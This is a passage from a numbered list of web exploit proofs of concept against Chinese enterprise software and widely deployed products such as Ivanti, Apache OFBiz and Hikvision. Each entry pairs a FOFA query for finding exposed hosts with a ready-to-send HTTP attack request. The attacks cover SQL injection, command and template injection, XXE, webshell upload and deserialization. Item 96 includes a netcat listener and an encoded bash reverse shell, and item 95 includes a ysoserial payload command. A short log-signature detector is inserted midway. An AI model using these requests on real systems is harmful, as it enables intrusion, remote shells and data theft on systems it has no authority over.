FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue decodes to a DOCTYPE that declares <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> and references &xxe; inside <Signature><Field><d Index="VALUE">...</d></Field></Signature>; the servlet parses it with external entities enabled.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server (致远M3-server) 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The backticks in the time parameter are evaluated by the shell, so ifconfig output is written next to the CGI. Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec campus service management platform (新开普掌上校园服务管理平台) service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered as a FreeMarker template, and the Execute built-in runs the command. Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software (F22服装管理软件系统) UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system (建设工程质量监督系统) FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The client chooses both the file name and the target directory; the declared image/png type is not checked against the body. Then request:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao (速达天耀) DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter is used as the save path without normalisation, so "../" places the body in the web root. Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE (思福迪LOGBASE) operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

The sql field is passed through FreeMarker before it is used, so the Execute built-in runs the command; a DNS lookup of the dnslog name confirms it.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it drops a Godzilla webshell. The accountId traversal makes the server write the uploaded archive contents under tomcat/webapps.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value is placed in a shell command line; the %0a newlines end the ping command and start a new one, and ${IFS} stands in for a space that a naive filter would strip.

87. DBAppSecurity MingYu security gateway (安恒明御安全网关) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter is appended to the save path, so the traversal decides both location and extension. Then request /jfhatuwe.php.

88. DBAppSecurity MingYu security gateway (安恒明御安全网关) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the injected command appends a PHP file to the web UI directory. Then request /txzfsrur.php (the name written by the echo above).

89. Seeyon FE collaboration platform (致远互联FE协作办公平台) editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

".js%70" is ".jsp" with the last character percent-encoded; the authentication filter compares the raw path while the container decodes it before dispatch. A response containing 24642 (111*222) confirms the injection.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata[type]=99&jsondata[ip]=ipconfig
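
An added example covering the injection families in this list rather than one item: 57, 58, 64, 66, 68, 69, 71 and 89 (MSSQL injection), 62, 75, 79, 82, 86, 88 and 90 (OS command injection), 76 and 84 (FreeMarker template injection) and 72 (XXE). It is not part of the original list. A defender can run it over access-log request lines or captured bodies: each line is URL-decoded repeatedly (so double encoding does not hide the payload) and matched against one signature set per class. The signature sets and the log lines are constructed for the example and mirror the request shapes above; extend them from your own traffic.

```python
import re
from urllib.parse import unquote_plus

# Each class lists patterns matched against a fully URL-decoded request line
# or body, case-insensitively.  Constructed starter set, keyed to the items in
# this list; tune it before using it as a detection rule.
SIGNATURES = {
    "sqli": [
        r"waitfor\s+delay\s+'",                    # items 64, 68, 69, 71
        r"\bhashbytes\s*\(\s*'md5'",                # items 58, 66
        r"select\s+@@version",                      # item 57
        r"\bunion\s+(all\s+)?select\b",             # items 66, 89
    ],
    "cmdi": [
        r"[?&][\w\[\]]+=[^&]*(\|\||\||`|\$\()",     # '|id', '||echo', `cmd`: items 62, 75, 79, 82
        r"\n\s*(cat|id|ifconfig|echo)\b",           # newline-injected command: items 86, 88
    ],
    "ssti": [
        r"<#assign\b",                              # items 76, 84
        r"freemarker\.template\.utility\.Execute",
    ],
    "xxe": [
        r"<!entity\s+\w+\s+system\b",               # item 72
    ],
}
_COMPILED = {cls: [re.compile(p, re.I) for p in pats] for cls, pats in SIGNATURES.items()}


def decode(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2527, %250a) are seen."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(line: str) -> list[str]:
    """Return the signature classes that match one request line or body, in SIGNATURES order."""
    decoded = decode(line)
    return [cls for cls, pats in _COMPILED.items() if any(p.search(decoded) for p in pats)]


def scan(lines):
    """Classify every line; return only the hits as (line_no, classes, line)."""
    out = []
    for i, line in enumerate(lines, 1):
        classes = classify(line)
        if classes:
            out.append((i, classes, line.rstrip("\n")))
    return out


# Constructed log lines (not captured traffic) mirroring request lines above;
# the last one is a benign request to the same handler as the first.
SAMPLE_LOG = [
    'GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1',
    'GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1',
    'GET /goform/webRead/open/?path=|id HTTP/1.1',
    'POST /cgi-bin/network_test.php body=host=%0acat${IFS}/etc/passwd%0a&command=ping',
    'POST /jeecg-boot/jmreport/queryFieldBySql body={"sql":"<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>${ex(\\"id\\")}"}',
    'POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet body=xmlValue=%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E',
    'GET /tplus/UFAQD/keyEdit.aspx?KeyID=1&preload=1 HTTP/1.1',
]

if __name__ == "__main__":
    for line_no, classes, line in scan(SAMPLE_LOG):
        print(f"{line_no}: {','.join(classes)}  {line[:80]}")
```

Decoding before matching is the important step: most of the requests above arrive with the interesting characters percent-encoded, and a rule that runs on the raw line sees none of them. The semicolon is deliberately not in the command-injection set, because it is also a legitimate SQL statement separator and would tag every time-based injection twice.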
91. Hikvision (海康威视) integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Two tricks are combined: "..;/" lets the request pass an authentication filter that matches on the raw path while the servlet container resolves it to /center/api/orgManage/v1/orgs/download, and fileName is then joined onto the download directory without normalisation.

92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization command execution.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QAX NetGod SecGate 3600 firewall (奇安信网神SecGate3600防火墙) app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The file is stored under /attachements/ with the client-supplied name. Then request:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% B6 h; L  K" d7 Z, v6 ?0 N5 ~8 s9 s8 N7 Q' l

94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify that the file was written (the filename must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial (the ping to a dnslog hostname is an out-of-band check):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 groovy remote code execution (ProgramExport)
CVE-2023-51467
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

The base64 string in the body below decodes to a bash -i reverse shell pointed at 192.168.40.128:7777 (the Kali listener); re-encode it for your own listener.
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The script value decodes to }Java.type('java.lang.Runtime').getRuntime().exec('ping a4xs0nop.dnslog.pw');{ so that the leading } and trailing { close and reopen the function body the platform wraps around the user script.

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

The body decodes to {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the injected command follows the pipe.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The traversal from the unauthenticated TOTP endpoint reaches /license/keys-status/, and the path segment decodes to ;curl a4xs0nop.dnslog.pw, which is the injected command.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

